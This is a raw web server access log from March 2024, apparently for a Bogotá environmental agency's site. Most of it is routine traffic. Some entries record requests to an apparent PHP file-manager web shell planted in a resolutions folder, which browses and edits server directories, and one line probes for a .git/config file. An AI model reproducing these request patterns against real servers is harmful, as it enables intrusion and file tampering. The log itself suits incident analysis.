186.28.213.82 - - [22/Mar/2024:02:11:01 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+ucaWXaoGzSkACkTWAj5++9XnO9gIzm9MKt+Rr0Eaa1ZAHumR+Iks6nb22Afvc3z+sf25HDjvAl3wTShteGumXINviPn8AE8s0BRZgy5UiYOKnaXs37aDGzSRXs7xk5ZIU8cplBR+rmy0WbKvsrPxCBB9BejCBK7P0G05xXRxZMxMvr1ij377G/4reFLPjszIkRqgj+D6MnoeOWLRqueLlHv6ZuZfsHOtvlIkJdvBEEM509Nd9wHEggTM3Flf8oqEAVRhB0s22k2i1dsGBNZzwlb6zQYEiDR5lkbATcm6nhnRoR8Avv3h4P/nq8DER91k7XtjyvYnq3haCtaSVibfIiiQOqFT31PEX9FDJIvfuM4LDLJVEezCn7TCDy4N+P2JQKg3uGHcxmHq0HM9a2BkuzcXCB0D8sw8jcExQgG71cbytPsIA8nvAbbJRWMnIAOdg4orUBv4ocvS1zkiRY52KTS3Dbsc4WMP/k83/hf2eiZXQsT8fLO0zAOpnb8YUryUZdlomIqhQKYozPl7kzU6MxuB7Z2JyWjVp4o3Z39QbpLSZTLEiBXwQQ+E8nMq+gVMEbuuAW7YgNGKLwmOqfX3WT5oL1eKG6WJ9gwAIeWoW2iUa0FZpzJktYaWg6zSLvL3iles0HqIGE1bgrR67yeLF2QxYj6HxN25pk9hyV7bemAdrYrJnbHQv6AUJ6q9nNUcuMyAiEaTNGWzULTJKkN8yf5bLlF+WIEos1EJ1ozXoprm2ywkSHvATOQqVQpELBev0/2cKlU+RXM4sIqZb7cr4nztHrAPqVNaGhfJZ38j7kLHmauZYpRZr9LqgLInrn9FkQY2SViouowiiuMtajal4BSUH5ht2P5IMDNxQUr+rp6kocT8hbGdHF5JjErVR3Dc9mz4pLAqCKH5drZdS+8K4FU55CnFrbKX1Jbusc6rlf2Lx1vpjInB8k6HmLXTI/jDek+vf3RmOJ8Sprw/+LH37Du2BkNLaECON1MM4INXMZ0NTLmHXobCVOxSn6Fa5SbLU1d6j71kyQ6bC/j2OYQOIjCnGYBLZJuE18AA87k72fQ21vMmd3rV9pia9a8ecRkf1t7Y1ZTXW+qggdi3pv50P1+u51psCJXGhYN6yOAiD/AeGPJqQjdBjcNFXlr4Z18eRRYl9SMJrcMHHmiM8A3wrMQz/3QPMQpLY2Y8QdfpmD2iammI+lT03pJTu7RSbdQFVXol8meH2JOsNr8yAhaUi9lgQ+rKUxWp1Hwp8dJZJeVfpJ98Gn8RYilmkIeAP/S4PtqGjO8RNEb2pHFnds3Aex/aMSmwg8cbnoUIoIOrF3q7sGvBgLVF+pnfXXS/Amdi44Nr53C00E1Wqy5jXSMQBq9l30Ghsv6WDP6MsptU0S9H6TP2DvVjXS3RRR91k4sSeiu0tieqqmS3LsTDnviZ2XeQkOnMuwVi73vbsW7UuKTpA5L+vWuJWuaX8G+eTCiRcUte2ZfxuHcihLVQIz+jBcV6RanNlikBYfbU9jm5JGNDDHCqtnEoLt3IeQtNPlLxRs6XaETgBPxkor4j1uB15PDs9Q4pQGlruFzr2NqbsUIlumxztm0Nyjf88dUw7mZJxyfzqy4mOo19XlZ9DDUwv8dJvNE3eatUdwSUeR0smkwbQl+kvxSW0sHRBOHrTC8Nxb3gogb7O5OC0k9VCThd30NyX3Ge9vSIZceN/GrFMLRBspFxzK1llsf/d66ATfXFwAPzR5DFGnHKsRuO+2Gywyy1OmCLUWgA=&u=U2FsdGVkX19yq+wjdPr1hlr7/GL4lrmPybYeDoCwugY=&y=U2FsdGVkX188HeRG5/eYSa6vvTBLZtf74QMkNInw1Rn9Mz+9DQw6h98YR2qsByfL HTTP/1.1" 200 3556
186.28.213.82 - - [22/Mar/2024:02:11:01 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18rNXAhtrtOw4RIucOn5vnXXJRq8pceOQAaegzf1O1XUbuZ/24jUiZanZPG41GmPLr5cqOD2rrr6JowDIspnJLZ8PsZimve8lSgTr0V/BkgHQkI/7Qmrcd/zPn/GznhbMUuBvM8Ub0btgqULtlDixmISShgCCVjqyM3CBP2b2LGHiyipBG9NtpS2HeLzboE6sx3c3TPOWJ/75xwXnxRFEVXYhBfXA0enm1pvVxoG4+QfMrzD+Ce3cr7xxSlmEHGMYC2zE/sRiGTBvvM+Rusw9xeU6gmJf3+K2WMRMOmXgfzb1P++EOuFGvwnPSUSn2DAkqAMdc1hpikRQvhWJSy3mQn3sp65bY06cmb18zdbKx1rZzks/tHMtyiDJOh4PmpSRCEbXjJNO+yJxxvcA2buJN5DCZyCjv9v4hoEU69tX6RmP2zC/C0rRIBqdo/34Q+mZ2Ega33aWLfdFT7qaGVWpP+2NKvk2oEZqClsD3IweiJ4+ek/JI+lmzRGNkbL0DpvHTl8aJAebyUix6p8zplnynEacl4YwHMRCD41u9ZbpaOU997C657MGUNy9Ne+qmph+CF8HrmAlKxPS838SNCmKbLLin0lZwlOre9HMAq8PcRUaKRP4AwEM+xp+3umPVvc7xOHDYsH7WFQ/j5IIQWbV+wBTjKw/nnYTskX+jvY3FDSZQFB9tYxYfdBg5cUOtfIIW2qVLUenOTHMFeynzUBBYFWBdOo0QeXpRJRaBTkopQ7dqBQE6OwGET&u=U2FsdGVkX19yq+wjdPr1hlr7/GL4lrmPybYeDoCwugY=&y=U2FsdGVkX188HeRG5/eYSa6vvTBLZtf74QMkNInw1Rn9Mz+9DQw6h98YR2qsByfL HTTP/1.1" 200 208
186.28.213.82 - - [22/Mar/2024:02:11:01 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1++OpTBBDiKBkTDE5txQQigfkQcbu7QsPb96Er9bMidxMvxGRdbxwfE HTTP/1.1" 200 30244
201.245.192.253 - - [22/Mar/2024:02:11:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:09:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:11:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [22/Mar/2024:02:11:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Mar/2024:02:10:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
181.53.238.69 - - [22/Mar/2024:02:13:17 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1451.pdf HTTP/1.1" 200 417886
181.53.238.69 - - [22/Mar/2024:02:13:17 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [22/Mar/2024:02:13:20 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
201.245.192.253 - - [22/Mar/2024:02:14:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:14:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
201.245.192.253 - - [22/Mar/2024:02:15:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:15:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
17.241.219.25 - - [22/Mar/2024:02:15:48 -0500] "GET /dia-del-voluntariado-ambiental-secretaria-de-ambiente-reconoce-las-iniciativas-que-trabajan-por-el-cuidado-de-la-biodiversidad-en-bogota.html HTTP/1.1" 200 1026
201.245.192.253 - - [22/Mar/2024:02:16:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [22/Mar/2024:02:16:54 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.10 - - [22/Mar/2024:02:17:07 -0500] "GET /ingresar-a-los-cuerpos-de-agua-de-los-humedales-esta-prohibido-no-arriesgues-tu-vida-por-unos-me-gusta.html HTTP/1.1" 200 894
173.252.107.5 - - [22/Mar/2024:02:17:07 -0500] "GET /robots.txt HTTP/1.1" 404 1034
173.252.107.6 - - [22/Mar/2024:02:17:08 -0500] "GET /images/cuerpos%20de%20agua%20en%20humedales-19-10.jpg HTTP/1.1" 200 73528
172.22.2.4 - - [22/Mar/2024:02:15:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:17:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:16:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
172.22.2.4 - - [22/Mar/2024:02:18:47 -0500] "GET /BLA/boletinlegal/geoserver/web/ HTTP/1.1" 404 1018
201.245.192.253 - - [22/Mar/2024:02:18:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37048
201.245.192.253 - - [22/Mar/2024:02:19:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38073
47.128.51.188 - - [22/Mar/2024:02:19:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6590.pdf&ft=edit HTTP/1.1" 200 3103
47.128.51.188 - - [22/Mar/2024:02:19:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.51.188 - - [22/Mar/2024:02:19:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
201.245.192.253 - - [22/Mar/2024:02:19:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.51.188 - - [22/Mar/2024:02:19:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.51.188 - - [22/Mar/2024:02:19:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.51.188 - - [22/Mar/2024:02:19:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.51.188 - - [22/Mar/2024:02:19:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.51.188 - - [22/Mar/2024:02:19:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.51.188 - - [22/Mar/2024:02:19:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.51.188 - - [22/Mar/2024:02:19:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.51.188 - - [22/Mar/2024:02:19:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
186.28.213.82 - - [22/Mar/2024:02:19:26 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18BIA4fKvoh2WV1WpIE1TejOR9cY4QsddATZnyj3VzAaAqgCjuUgaOz&y=U2FsdGVkX1+LUw1UT1XlKvrZYXUJeoH0KWI8Cas2oEFn3jZ+TtqSEC4Z/sFPHNTk HTTP/1.1" 200 30
186.28.213.82 - - [22/Mar/2024:02:19:27 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19VEdaN/8VQY+95BLj6RDhHa20oDLMdlyVHlWwEa++Hh8hpltRJK2dv2UAGsou9wMm9n3Q36dWPcE1kx40JANO6/1DeEA94/AM=&u=U2FsdGVkX19FaLnz2itXwUCzzP2U67H2UNY3mChPnkE=&y=U2FsdGVkX1+LUw1UT1XlKvrZYXUJeoH0KWI8Cas2oEFn3jZ+TtqSEC4Z/sFPHNTk HTTP/1.1" 200 97
186.28.213.82 - - [22/Mar/2024:02:19:27 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19CzLhdf9Tw8SDi1bJob048CdUm0yTiKr01UTru/a0B7jhE1QWbSl985scKsKQV2LNLuGSq+JKAHEv+tQ8oVJDa7P4nnidP8p1KXmm0KZJDF0QmCVcgCCCuJDepzF5BIoWh3pWGaK0Ymi8QLYI4YK23WLR5pOtBTeEaEJ7mNUd4WvQjNbe5nARsYTHmaPomnD5EXLhHWBfHPfRovoJcziVLbzxIR/dMHmw1QIe5wno4kO6tOJW3k6by2nsdz4rewKJZe21/5Q/1avmdYTtiffnkkXc3j9R/0OtKkOxFB2Ssky4qjOactJbPg1dz2hko60Z4YO+8pLDfEpFN+93D065GpT3D8CWLtSADDLYdu/PRn0WpRn7vfwPJN4sPYFIqZ6lJzo9Uxp3UfCTRf/Zq3RYC84SACQcGio+RjF91mj4sFbvvEVRnMZGD5ZiKx8EuUTE28S1tLLzyu//mbR6DFmwK1eh/BM4srHVFLbpdPyc0M7R5b8J28JtN3OtQy11/qANd8FjkIgWKLrNwKc83TZu9/9XNCpEJzGmt9MO0IgiuDWpaLRkQA8TypXo0A6NsaBaZ8wQHzCqhKg/74sfYVz8jPdhbJYrR52xO8CzfwvtIOkIgXhoYYN9hS10F06J4QQxQczNpOzKr75aG8+BaraD74Pvb/FMM07iy7b6yKLgqXpolwMMPbo7GsufakU9r+2Y6YxhGgWPo50DsP7lgMx3URbqjvO3d+iqxh8SIIH9bzDTnUj8qPOCXkuUWw7aPgxvRhrY2IyS9RMFK8+8PM5V0HBq+XOOgp2eyuSrBHDK2aWv/hk901aqrVVU3LlL6o7BgCn+WQ5AVgcECctr3DQhMipdA52bbTWEOgE/E+vHgoM2Ey+Ah1fomZDaetk66sS/poDboZxFjB7bZPAgRb3KKkeQr4IhYU0KJcT/nhoWp2fSEsPFR5aa39zXDg4AQwzYrHLHedJxiE64RIEj4w/DI5kIALgiqp+UhPmLkRHCzfpEJGUHzMQ99EbLZfQrMImnwk9Ppib/95ZIVKPW9GrJB0nyalrzrdxfkGMQ4aRJci9h2uGVSLatIGhf+BK+dJRwUBhFN+jlHIA2E5Gu5RgrPQ22kZIoT6726iKxv5keSVIAoHHURyxtmSnhSWf7Vvp4UYt4EKtdF06aUMtVrKo0clalOZ7sAUsC4ufRJ50NEEPdx1StCQEFqzGH+fuxTQXMCPpAMF1mjeM6jK8RLqGlr3gujnGEFSYklA9SvfzsGL5me4qltjBJoEx2DpTZyDZ+/cBqzikeh9ndj20pyx/SufFA95AZtG1LneBkltuKMdHftb1OajN9RqvF+hGfwikWNhSSnQy7+4ZpcuRpPS6rL1wRg9X+GETpQxd+0dB7jepbdupevrBNIy10CbA57ObK20cHXOcP6xl3dFjnd2pDDCrarN71j7Nrhw8T9h7u729bizRvZB1O/9rK1WruJQ8Bvlb0PhgqJrasdeqyfHRkzjlVN7AYkHqKJMFGcAHDqKGEJxitUoIkqhPx7lcnsoNxYz6QgrqJIPmpl36+vMkMa/sMqbITF4u93iKnmhb32hs1Og3qfrHT4ofptSGqexVyPGnZ1MfIrTlFLB37eHDIIoP64jC5PJdhRWdoZJuJm0zm+cXa4E4Qq6JcMMKgi9IrVz0XB3IY6SpeQeFKYK/s4AIEbl9b8rO3rWXVCU9okFhNkuOplbwruWrPyiZjSxHP6wqXcfIE3OqjFQ7Xpj/VXCTeduBRjUfE=&u=U2FsdGVkX19FaLnz2itXwUCzzP2U67H2UNY3mChPnkE=&y=U2FsdGVkX1+LUw1UT1XlKvrZYXUJeoH0KWI8Cas2oEFn3jZ+TtqSEC4Z/sFPHNTk HTTP/1.1" 200 3556
186.28.213.82 - - [22/Mar/2024:02:19:27 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+P5MeyMswvIFH0OxBG0XwLQ7JhV3+wHfb5GQtP7HsNPSeKhrx4JPEUCyIYAMl/hnyUWpEYI87y7AhkrBFxpC4t7bbMbAlcwceqtxuhKPlOb/4kYrwbKBQSn88JJeiePkxWoTNNU9gJlUPFUwXprFTvn80OJ4WNdUWfQnJ4iei9pOosnkMvQAA2LJQnD1r/ejUhSQXLcrMB+moAuTOgB2eqI5BaHBejmYWch4+LZxeCBvASqvlLA6UTj8crPdcGUmzQMOoM69NlOJKbAZ1bM4ZE9CI2mLtSnl8jz7imen1wUj1WiATKlfJLUIzNiVaZ/6XeSLj1VpQUApnh3eiX2BLsps7EBhEYLc8yFXQvnuC0/7eVHEJ52go/hhUOZZKknk7mkl412NrzhtTg0i+QzlhuAhwo+q2LvSOV9SXyn0+93ZEI3lHsEgOQr4Omrvn0YYy2dkrjHJHpYvEXtGuIVvTN4YnqaPXBWD51tLM4Y44QOVlUGya/TbceoU4Vy1sRUZ2mjLMkQRVgSkOD3s9TolSVykaoVy/T9REVwC3F2iyS/Izmvrt2dZznG4DG6h8b1KS/66gvneyQeMivSdPmWiS1LFmENDVWj2z2+PScITXO885+kD7GY3AjU2nIfR/ZUDpdExKgR3NHSc5GEnrjUR34GPe3RNYltWiJ2C4OEw+oE1/QEjNKfc9Eekj06y9aAzHDtXUIur0aLjdrV/URJPlP0gXTTINWGnAJnDSGgKRjgFG4wKZaST/j&u=U2FsdGVkX19FaLnz2itXwUCzzP2U67H2UNY3mChPnkE=&y=U2FsdGVkX1+LUw1UT1XlKvrZYXUJeoH0KWI8Cas2oEFn3jZ+TtqSEC4Z/sFPHNTk HTTP/1.1" 200 208
186.28.213.82 - - [22/Mar/2024:02:19:27 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18BIA4fKvoh2WV1WpIE1TejOR9cY4QsddATZnyj3VzAaAqgCjuUgaOz HTTP/1.1" 200 30244
201.245.192.253 - - [22/Mar/2024:02:19:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37767
47.128.18.199 - - [22/Mar/2024:02:19:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=d&d=E%3A%5Cnuevo%5Chtdocs%5CPMA-RAMSAR%5C7.+Capitulo+VI.+Lineamientos+y+recomendaciones HTTP/1.1" 200 2824
201.245.192.253 - - [22/Mar/2024:02:19:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:19:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
47.128.36.11 - - [22/Mar/2024:02:19:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=60SegundosJul23.flv&ft=info HTTP/1.1" 200 3701
47.128.36.11 - - [22/Mar/2024:02:19:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.36.11 - - [22/Mar/2024:02:19:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.36.11 - - [22/Mar/2024:02:19:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.36.11 - - [22/Mar/2024:02:19:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.36.11 - - [22/Mar/2024:02:19:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.36.11 - - [22/Mar/2024:02:19:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.36.11 - - [22/Mar/2024:02:19:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.36.11 - - [22/Mar/2024:02:19:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_flv HTTP/1.1" 200 1034
47.128.36.11 - - [22/Mar/2024:02:19:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.36.11 - - [22/Mar/2024:02:19:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
172.22.2.4 - - [22/Mar/2024:02:20:18 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
47.128.114.208 - - [22/Mar/2024:02:20:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1646.pdf&ft=edit&white=1 HTTP/1.1" 200 3102
47.128.114.208 - - [22/Mar/2024:02:20:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.114.208 - - [22/Mar/2024:02:20:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.114.208 - - [22/Mar/2024:02:20:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.114.208 - - [22/Mar/2024:02:20:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.114.208 - - [22/Mar/2024:02:20:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.114.208 - - [22/Mar/2024:02:20:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.114.208 - - [22/Mar/2024:02:20:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.114.208 - - [22/Mar/2024:02:20:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.114.208 - - [22/Mar/2024:02:20:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.114.208 - - [22/Mar/2024:02:20:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
201.245.192.253 - - [22/Mar/2024:02:20:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38073
172.22.2.4 - - [22/Mar/2024:02:21:14 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2027%20de%20Junio%20de%202018.pdf HTTP/1.1" 200 217496
114.119.135.172 - - [22/Mar/2024:02:21:37 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2023/ HTTP/1.1" 200 14374
216.245.221.92 - - [22/Mar/2024:02:21:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:22:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.20 - - [22/Mar/2024:02:22:39 -0500] "GET /Publicaciones/2023EE217035.pdf HTTP/1.1" 404 228
66.249.66.19 - - [22/Mar/2024:02:22:39 -0500] "GET /Publicaciones/2024EE02533.pdf HTTP/1.1" 404 227
172.22.2.4 - - [22/Mar/2024:02:21:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:23:16 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:22:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
201.245.192.253 - - [22/Mar/2024:02:24:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [22/Mar/2024:02:25:04 -0500] "GET /robots.txt HTTP/1.1" 404 1018
13.56.33.4 - - [22/Mar/2024:02:25:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.165 - - [22/Mar/2024:02:25:42 -0500] "GET /portaldeninos/2021/05/30/agua-3/ HTTP/1.1" 200 92909
167.94.138.52 - - [22/Mar/2024:02:25:48 -0500] "GET /portaldeninos HTTP/1.1" 404 1035
167.94.138.52 - - [22/Mar/2024:02:25:49 -0500] "PRI * HTTP/2.0" 400 946
201.245.192.253 - - [22/Mar/2024:02:26:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:26:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [22/Mar/2024:02:26:54 -0500] "HEAD / HTTP/1.1" 200 -
47.128.42.168 - - [22/Mar/2024:02:26:58 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.21 - - [22/Mar/2024:02:27:11 -0500] "GET /residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 200 12356716
66.249.66.2 - - [22/Mar/2024:02:27:16 -0500] "GET /Residuos/cosmeticos/files/guia_cosmeticos-aseo.pdf HTTP/1.1" 200 13926317
66.249.66.2 - - [22/Mar/2024:02:27:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%25202015/0350.pdf HTTP/1.1" 404 1018
139.180.136.106 - - [22/Mar/2024:02:27:27 -0500] "GET /robots.txt HTTP/1.1" 404 1018
17.241.227.170 - - [22/Mar/2024:02:27:47 -0500] "GET /desde-el-paramo-mas-grande-del-mundo-sumapaz-bogota-se-alista-para-ser-sede-de-la-cop16.html HTTP/1.1" 200 981
201.245.192.253 - - [22/Mar/2024:02:28:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:27:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.27.170 - - [22/Mar/2024:02:28:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4630.pdf HTTP/1.1" 200 3035
47.128.27.170 - - [22/Mar/2024:02:28:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.27.170 - - [22/Mar/2024:02:28:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.27.170 - - [22/Mar/2024:02:28:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.27.170 - - [22/Mar/2024:02:28:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.27.170 - - [22/Mar/2024:02:28:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.27.170 - - [22/Mar/2024:02:28:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.27.170 - - [22/Mar/2024:02:28:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.27.170 - - [22/Mar/2024:02:28:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.27.170 - - [22/Mar/2024:02:28:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.27.170 - - [22/Mar/2024:02:28:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
201.245.192.253 - - [22/Mar/2024:02:28:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37048
